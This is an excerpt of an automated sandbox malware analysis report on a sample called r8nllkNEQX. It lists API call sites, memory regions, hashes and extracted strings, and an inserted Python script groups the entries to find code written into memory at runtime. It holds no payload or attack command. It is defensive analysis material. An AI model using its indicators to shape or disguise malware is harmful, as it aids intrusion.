                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID:
                                    • API String ID: 3358416759-0
                                    • Opcode ID: 7962cbe1c45b59462820b81a3f2644d6ca7b615c2dc1711c3d469539a7b7021b
                                    • Instruction ID: 213e85466d27a5584cddd8a7022b78286a51db3a8551e37b8d9c9ed6a276b603
                                    • Opcode Fuzzy Hash: 7962cbe1c45b59462820b81a3f2644d6ca7b615c2dc1711c3d469539a7b7021b
                                    • Instruction Fuzzy Hash: C6116670808B8596EB268F1CD8027F6F3F4EFD4329F109619E59942550F7725AD68BC2
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 8483b4b63edfb1d6cc1525721403be727665c7d7a4bc09b9f4cd86b6fb8e66c0
                                    • Instruction ID: f1b9c8948754809bc3c0f6e7ba13dcf666975b9d0d6b48a3b352c449ce7cb05c
                                    • Opcode Fuzzy Hash: 8483b4b63edfb1d6cc1525721403be727665c7d7a4bc09b9f4cd86b6fb8e66c0
                                    • Instruction Fuzzy Hash: 80F0C0FB005400BF8102556099C8EFA7B6CB9CB6303210184E0058B9C2D3D94246C7F2
                                    APIs
                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0039A97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: 9c1b74514fef7b778e9b49616e0ea2d78b468c81bb68e1dcfbe18284c65a2439
                                    • Instruction ID: 59a83a28c8bd89d61bb867535502964089262e5ecec6b460a4c6a8f98b5b28cc
                                    • Opcode Fuzzy Hash: 9c1b74514fef7b778e9b49616e0ea2d78b468c81bb68e1dcfbe18284c65a2439
                                    • Instruction Fuzzy Hash: E601A272B01B14AFC7159F28DC45B5AB7A5FF84720F068659FA982B361C331BC118BD1
                                    APIs
                                    • socket.WS2_32(?,0039B280,00000000,-00000001,00000000,0039B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0039AF67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID:
                                    • API String ID: 98920635-0
                                    • Opcode ID: eb443b55324c456d847cbec07e8aad63b2a44130950df7732ca72e8712b77563
                                    • Instruction ID: a9ccf2eb21d9991be896c7a1dd3dca37762f34a2c04e64d7bc3c23192ec03cf7
                                    • Opcode Fuzzy Hash: eb443b55324c456d847cbec07e8aad63b2a44130950df7732ca72e8712b77563
                                    • Instruction Fuzzy Hash: F1E06DB2A086256BCA10DA08E8409ABF3A9EFC4B20F064A09B85463304C330AC448BE2
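Every entry in this listing has the same shape: an optional APIs list with resolved call sites, a Memory Dump Source line naming the region (its Offset and whether it is backed by a PE image), and a Similarity block keyed by Opcode ID. Read one at a time the entries are repetitive; grouped by region they show something the raw listing hides. The script below is an added example, not part of the Joe Sandbox report: it parses five entries transcribed from this page (constructed inline, with the Similarity header, Associated and fuzzy-hash lines trimmed) and summarises them per region, so that the Process32FirstW/Process32NextW and GetLogicalDrives call sites fall into the regions at 070A0000, 070F0000 and 07100000 that the report marks "based on PE: false", while the gethostname call sits in the image-backed region at 002D0000. Field names are the report's own; the dataclasses, regexes and helper names are this example's.

```python
"""Group Joe Sandbox function-similarity entries by memory region (added
example, not part of the report; the field names are the report's own)."""
import re
from dataclasses import dataclass, field

# Constructed sample: five entries transcribed from this page, with the
# Similarity header, Associated and fuzzy-hash lines trimmed.
SAMPLE = """\
APIs
• Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
Memory Dump Source
• Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
• API ID: FirstProcess32
• Opcode ID: 998ebb1c74cbc9485a43d7473a1498c129eecefc6dc0e7d9be2d23748f65f8dd
APIs
• Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
Memory Dump Source
• Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
• API ID: NextProcess32
• Opcode ID: 9b947e9ee563f9133f4320d94f51055a30ea48eea922dfc71002286870ada3a9
APIs
• Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
Memory Dump Source
• Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
• API ID: NextProcess32
• Opcode ID: 5a9feb2ac0b61bf1554bc84a2d326539afffecb542933a48bb0b79c61f302597
APIs
• GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
Memory Dump Source
• Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
• API ID: DrivesLogical
• Opcode ID: d998935baac9f1329447e8b5ebae3c1dca3121848674bb90bbdb18c6b015a9ce
APIs
• gethostname.WS2_32(00000000,00000040), ref: 00384AA5
Memory Dump Source
• Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
• API ID: gethostname
• Opcode ID: af1b516954e691c970b3902f4a07d54f49a921594975aa32d26acff4161748af
"""

@dataclass
class ApiCall:
    name: str    # API name as printed, e.g. Process32NextW
    module: str  # module the report resolved it to, e.g. KERNEL32
    ref: str     # address of the call site

@dataclass
class Entry:
    offset: str = ""         # region base, from the Source File line
    pe_backed: bool = False  # "based on PE: true" means image-backed memory
    opcode_id: str = ""
    api_calls: list = field(default_factory=list)

@dataclass
class RegionSummary:
    offset: str
    pe_backed: bool
    functions: set = field(default_factory=set)   # distinct Opcode IDs
    call_sites: set = field(default_factory=set)  # "Name.MODULE@ref"

API_RE = re.compile(r"^•?\s*(\w+)\.(\w+)\(.*\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")

def parse_entries(text):
    """One Entry per 'Memory Dump Source' block. The APIs list that precedes a
    block belongs to it, so call lines are buffered until the block starts."""
    entries, pending, cur = [], [], Entry()  # cur is a placeholder until the first block
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = Entry(api_calls=pending)
            pending = []
            entries.append(cur)
        elif (m := API_RE.match(line)):
            pending.append(ApiCall(*m.groups()))
        elif line.startswith("• Source File:") and (m := SRC_RE.search(line)):
            cur.offset, cur.pe_backed = m.group(1).upper(), m.group(2) == "true"
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    return entries

def summarize_by_region(entries):
    regions = {}
    for e in entries:
        r = regions.setdefault(e.offset, RegionSummary(e.offset, e.pe_backed))
        if e.opcode_id:
            r.functions.add(e.opcode_id)
        for c in e.api_calls:
            r.call_sites.add(f"{c.name}.{c.module}@{c.ref}")
    return regions

def unbacked_regions_with_apis(regions):
    """Regions with no PE image behind them that still resolve API calls: code
    written into memory at runtime, where an unpacked or injected stage lives."""
    return sorted(o for o, r in regions.items() if not r.pe_backed and r.call_sites)

if __name__ == "__main__":
    regions = summarize_by_region(parse_entries(SAMPLE))
    for off, r in sorted(regions.items()):
        print(off, "PE-backed:", r.pe_backed, "functions:", len(r.functions), sorted(r.call_sites))
    print("runtime-written regions calling APIs:", unbacked_regions_with_apis(regions))
```

Opcode ID counts functions, while call sites collapse the several entries that reference the same ref address (the three Process32NextW functions above all call through 071004B3). Fed the whole function section of the report, the parser also picks up the entries that carry no APIs list, which simply contribute a function to their region and no call site.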
                                    APIs
                                    • closesocket.WS2_32(?,00399422,?,?,?,?,?,?,?,?,?,?,?,w38,007AC880,00000000), ref: 0039B04D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 724333adabb8bc93be2162de41717cccdf0760c47156f135efd23595fdab4940
                                    • Instruction ID: a287c9056ffc05576b0c71b14336dbfa903951a1019ea387a48d9070ac79a0d5
                                    • Opcode Fuzzy Hash: 724333adabb8bc93be2162de41717cccdf0760c47156f135efd23595fdab4940
                                    • Instruction Fuzzy Hash: 8DD0C23430020157CE208A14D984A57B26B7FC0310FA9CB6CE02C4A260D73BCC438601
                                    APIs
                                    • ioctlsocket.WS2_32(?,8004667E,?,?,0030AF56,?,00000001), ref: 003367FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ioctlsocket
                                    • String ID:
                                    • API String ID: 3577187118-0
                                    • Opcode ID: a13e9c9df0d5a849ecd289dec0b8957d2aa855ccff3521f914db4d2f8014e20c
                                    • Instruction ID: cf197a33307673fae5981a8a78e34832f12856552c5e8151f62079c405236f7b
                                    • Opcode Fuzzy Hash: a13e9c9df0d5a849ecd289dec0b8957d2aa855ccff3521f914db4d2f8014e20c
                                    • Instruction Fuzzy Hash: 06C012F1218101AFC6088724D455F2FB6D9DB44365F01581CB046C1190EA305990CA16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 9e7c76847b58b1117c3d836838308d01f3f45bc5e41ff2e6f9663a2bbe4c5748
                                    • Instruction ID: 217e7321a1301dceea1adfa2188b7b9f045e446ae34e7599790c29cf3f82a3c3
                                    • Opcode Fuzzy Hash: 9e7c76847b58b1117c3d836838308d01f3f45bc5e41ff2e6f9663a2bbe4c5748
                                    • Instruction Fuzzy Hash: 3C3125E706C11AADAB0286459B50BFE77BEEAD7334F30463AF427A6A01D2610F492571
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 87555f835d40bac220efd3c10ab32be2be4d31db55f2d8a5af56b4b0cc437622
                                    • Instruction ID: 3b3d57fea1955cac036ac33fe8429b0d6da6739d77f6cc2a1fb174ba334b1589
                                    • Opcode Fuzzy Hash: 87555f835d40bac220efd3c10ab32be2be4d31db55f2d8a5af56b4b0cc437622
                                    • Instruction Fuzzy Hash: 232122E716C116BDAA0286409B50BFE7B7EE6D7334F304237F477E5A02D3A10A496171
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: de253d46caedfb9f023dddb84103b17ab0d2acbd508e79f59a7c819338c6f876
                                    • Instruction ID: 4ff4a0d01f6894dc2353b7500a6d8bc24c3f2b9b109cecdebfc8bb1f719eea93
                                    • Opcode Fuzzy Hash: de253d46caedfb9f023dddb84103b17ab0d2acbd508e79f59a7c819338c6f876
                                    • Instruction Fuzzy Hash: 3C2125E716C116BDAA028A459740BFEB7BEEAD7334F304636F467A5602D3610F486570
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 905560a929231de642275a329c3781d6267d262c9e4a6c94ef5adb1abab18ae2
                                    • Instruction ID: 62f323103a7117e37681577f23098f0a40a8885151b9dfcedcdecdc8aff2ef12
                                    • Opcode Fuzzy Hash: 905560a929231de642275a329c3781d6267d262c9e4a6c94ef5adb1abab18ae2
                                    • Instruction Fuzzy Hash: 702121E706C25BADAB0286456750BFE7ABEEAD7730F308637F827E6502D2510F482570
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 71515a86382911697bbc8194802be9df557070733865c6fb1440b045dfd8447d
                                    • Instruction ID: 5c7c59396e1237ebdddf26c107b606ccae0c94925e108a0b2660a888767fc1a6
                                    • Opcode Fuzzy Hash: 71515a86382911697bbc8194802be9df557070733865c6fb1440b045dfd8447d
                                    • Instruction Fuzzy Hash: FE21E0E706C116FDAA0286455B50BFE76AEE6D7330F308736F437A5A01D2A00B883570
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 26f190b912f871fae15c62db606beb23b79db3a9245348419adc73398501adad
                                    • Instruction ID: e04f61b521cd74aba1498a01a279dab490809818dac62f865511ca3c25f158d5
                                    • Opcode Fuzzy Hash: 26f190b912f871fae15c62db606beb23b79db3a9245348419adc73398501adad
                                    • Instruction Fuzzy Hash: EF21CFE716C117AC6A4286456750BFE7AAEE6D7734F308636F427A5A01E2A10B893470
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 2d482a14ccb69a30dc727f47fa91b007c0107fc44c8d57bf323c5594bda45135
                                    • Instruction ID: c63c156c62d18b3e9bc5aaf8ad5b5ab079265ff6178a529fc39348e449becc5b
                                    • Opcode Fuzzy Hash: 2d482a14ccb69a30dc727f47fa91b007c0107fc44c8d57bf323c5594bda45135
                                    • Instruction Fuzzy Hash: CB2101E716C227BDAA028A45AB41AFE7B7EE5C7330F308637F427E5901E2950E492471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 9a4bc9133b0b7d6d0785628aeda9a045d36df6ee5c195cf2a19ec0772fc27965
                                    • Instruction ID: a9bc7b1d7408a46f1474302fb506727f80b324d0097d4578df03f98414f04dcf
                                    • Opcode Fuzzy Hash: 9a4bc9133b0b7d6d0785628aeda9a045d36df6ee5c195cf2a19ec0772fc27965
                                    • Instruction Fuzzy Hash: E621D2E616C116BDAA0286416B50BFE7BBEE6D7330F308637F827E5601E6A50F482471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 282c77408c71dd23a4160948dea7a79c79a6cd3c0df02b7ca3eea0ad3821c5ad
                                    • Instruction ID: a4227a42818bb39e4ced079fc8587f083f48bd6b981a4185eeef5af53bbe2bb9
                                    • Opcode Fuzzy Hash: 282c77408c71dd23a4160948dea7a79c79a6cd3c0df02b7ca3eea0ad3821c5ad
                                    • Instruction Fuzzy Hash: 20110AE616C11ABD6A0297455740AFE767FE6D7330F308637F427F5A01D3A50E492471
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 9e86a8dd28a3925137907044e6c1709f3d3ee77e1db6f351984325ebd4ef01d5
                                    • Instruction ID: 08cfbc4f7c7202134aa0ffca336a27c34daf1db2911c20e74b7c3bf07b3b1f37
                                    • Opcode Fuzzy Hash: 9e86a8dd28a3925137907044e6c1709f3d3ee77e1db6f351984325ebd4ef01d5
                                    • Instruction Fuzzy Hash: FE3192B49093059FDB00EFB8C58969EBBF0AB45344F008969E898A7341E7349A44CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 5621ad1c6e13af90d1c518d0c2e28f7f38e1ba8363953ac8b22df10797e61dde
                                    • Instruction ID: ce089c184af5b25e650117c6e736e555b0076bad46db497d60fd6379c2df5466
                                    • Opcode Fuzzy Hash: 5621ad1c6e13af90d1c518d0c2e28f7f38e1ba8363953ac8b22df10797e61dde
                                    • Instruction Fuzzy Hash: 1D01D6E616C25ABC6A0297455740AFE7A7ED5D7730F308637F427B5A01D2950F882471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 0ab14539293ddf972f4047d5cc75ac6369c72f56843905bf33ea57a571eca580
                                    • Instruction ID: 0c38cc9e7ce41d6ba4b38ac2d83e0350b8a755411c2763f4f717dac7f3eeb40e
                                    • Opcode Fuzzy Hash: 0ab14539293ddf972f4047d5cc75ac6369c72f56843905bf33ea57a571eca580
                                    • Instruction Fuzzy Hash: 3701F2E6168216BCAA028B455B10AFE76AEE5DB730F308637F467F1A01D2950F582971
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                    • API String ID: 0-1371176463
                                    • Opcode ID: 51452e212d0a760b99323f2adedad391da7f09974387e90b05b3c54b864771e6
                                    • Instruction ID: f2f28d7eeb4affa8f23c5925185dd463a359dc84bf51c775ccce221cc66e9729
                                    • Opcode Fuzzy Hash: 51452e212d0a760b99323f2adedad391da7f09974387e90b05b3c54b864771e6
                                    • Instruction Fuzzy Hash: D9B23970A48301AFD72A9A24DC42BA777E5AF58300F09453CFD9997282FB75ECA4C752
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                    • API String ID: 0-122532811
                                    • Opcode ID: 744bba7743ee615be2f0bf1e129c2f56906547e5913a0dd0c317eb1321823bbd
                                    • Instruction ID: f53b3738a48ba0e3948e561047d6e2439e73bbb701ebfca69c24ea214fb4fd76
                                    • Opcode Fuzzy Hash: 744bba7743ee615be2f0bf1e129c2f56906547e5913a0dd0c317eb1321823bbd
                                    • Instruction Fuzzy Hash: E4421671B18740AFD708DE28CC41B6BB6EAFBC8704F448A2CF55997391E775AC148B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                    • API String ID: 0-3977460686
                                    • Opcode ID: f48a0b0b89bad4f39d588a01f116a1dfe350eefe2d95853369d5ff17b7a49608
                                    • Instruction ID: 47e685de0e97f2deb073dc43e3f8f4d76457b3d9eddf0bc7a24c7a9882e398a1
                                    • Opcode Fuzzy Hash: f48a0b0b89bad4f39d588a01f116a1dfe350eefe2d95853369d5ff17b7a49608
                                    • Instruction Fuzzy Hash: AF32AE71A643824BC714BE2A8C4131A77DAAF91320F94472DF9B58B3D2E774DD618B82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
